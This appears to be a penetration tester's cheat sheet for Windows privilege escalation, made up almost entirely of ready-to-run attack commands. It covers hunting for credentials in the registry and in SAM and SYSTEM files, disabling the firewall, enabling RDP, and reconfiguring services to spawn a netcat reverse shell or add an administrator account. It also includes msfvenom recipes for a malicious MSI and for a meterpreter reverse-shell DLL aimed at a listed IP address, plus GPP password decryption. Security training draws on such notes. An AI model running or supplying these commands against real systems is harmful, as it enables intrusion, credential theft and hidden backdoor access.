Windows Privilege Escalation

Basic Information

systeminfo
set
hostname
net users
net user user1
net localgroups

# Set path:
set PATH=%PATH%;C:\xampp

Firewall

netsh firewall show state
netsh firewall show config

# Turn firewall off

netsh firewall set opmode disable

# allow RDP
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Cleartext passwords

Windows autologin:
reg query "HKLM\SOFTWARE\Microsoft\WindowsNT\Currentversion\Winlogon"

VNC:
reg query "HKCU\Software\ORL\WinVNC3\Password"

SNMP Parameters:
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"

Putty:
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
	
Search for password in registry:
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

Find files

dir /s /b /a | findstr filename
dir /s *pass* == *cred* == *vnc* == *config*
findstr /si password *.xml *.ini *.txt *.config
findstr /si pass *.xml *.ini *.txt *.config

Check these files

c:\sysprep.inf
c:\sysprep\sysprep.xml
c:\unattend.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml
web.config

System and SAM:
windows\repair\SAM
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system

Kali command to get hashes:
samdump2 -o hashes.txt system.old sam.old

Windows\NTDS\ntds.dit

Weak File Permissions

accesschk.exe -qwsu "Everyone" *
accesschk.exe -qwsu "Authenticated Users" *
accesschk.exe -qwsu "Users" *

Reconfigure service parameters

Unquoted service paths
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """

Weak service permissions

upload accesscheck from Sysinternals to find weak permissions
accesschk.exe -uwcqv "currentuser" *
accesschk.exe -uwcqv "Everyone" *
accesschk.exe -uwcqv "Authenticated Users" *
accesschk.exe -uwcqv "Users" *

sq qc "vulnerableservicename"
	
Note the space after the equals sign and before the quotes when using sc config below

To reconfigure to send netcat reverse shell:
sc config SERVICENAME binpath= "C:\pathtonetcat\nc.exe -nvIPADDRESS PORT -e "C:\Windows\System32\cmd.exe"
sc config SERVICENAME obj= ".\LocalSystem" password= ""
	
To reconfigure to add privileged user:
sc config SERVICENAME binpath= "net user hackerman password /add"
sc stop SERVICENAME
sc start SERVICENAME
sc config SERVICENAME binpath= "net localgroup Administrators hackerman /add"
sc start SERVICENAME

Inside Service

netstat /a
netstat -ano

Insecure File/Folder Permissions

XP and older:
cacls filename

Vista and newer:
icacls "C:\Program Files (x86)\ProgramFolder\Subfolder"

Powershell:
Get-Acl | fl
Get-ChildItem | Get-Acl

Check for AlwaysInstallElevated

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# If you get a return code then any package will install with admin privileges, install a malicious msi to do whatever you like

msfvenom -f msi-nouac -p windows/adduser USER=hackerman PASS=password -o add_user.msi

Installed software

tasklist /svc
net start
reg query HKEY_LOCAL_MACHINE\SOFTWARE
DRIVERQUERY

Look in:
C:\Program files
C:\Program files (x86)
Home directory of the user

Find version of OS via files such as explorer.exe and use pev on Kali
pev -p explorer.exe

Scheduled tasks

schtasks /query /fo LIST /v

C:\windows\tasks

Windows Scheduled Task Log:
c:\WINDOWS\SchedLgU.Txt

DLL Hijacking

Examine processes, identify any which may be running as a higher privileged user

Download exe and examine to find any references of DLL loading with procmon from sysinternals

Set filters to the processname, result is NAME NOT FOUND, and Path ends with .dll

Check file permissions with icacls to see if any locations listed are able to be written to by current user

Create dll payload:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.2.60 lport=8989 -f dll > hijackable.dll

Add user and enable RDP

net user hackerman hack123 /add
net localgroup Administrators hackerman /add
net localgroup "Remote Desktop Users" hackerman /ADD

Enable RDP:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

If you get this error:
"ERROR: CredSSP: Initialize failed, do you have correct kerberos tgt initialized?
Failed to connect, CredSSP required by server.""
Add this reg key:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f

Group Policy Preferences

Output environment-variables:
set

Look for the following:
LOGONSERVER=\\NAMEOFSERVER
USERDNSDOMAIN=DOMAIN.LOCAL

Look up ip-address:
nslookup nameofserver.domain.local

Mount SYSVOL
net use z: \\IPADDRESS\SYSVOL

Enter the mapped drive:
z:

Search for groups.xml file:
dir Groups.xml /s

Decrypt any passwords in Kali:
gpp-decrypt encryptedpassword

Last updated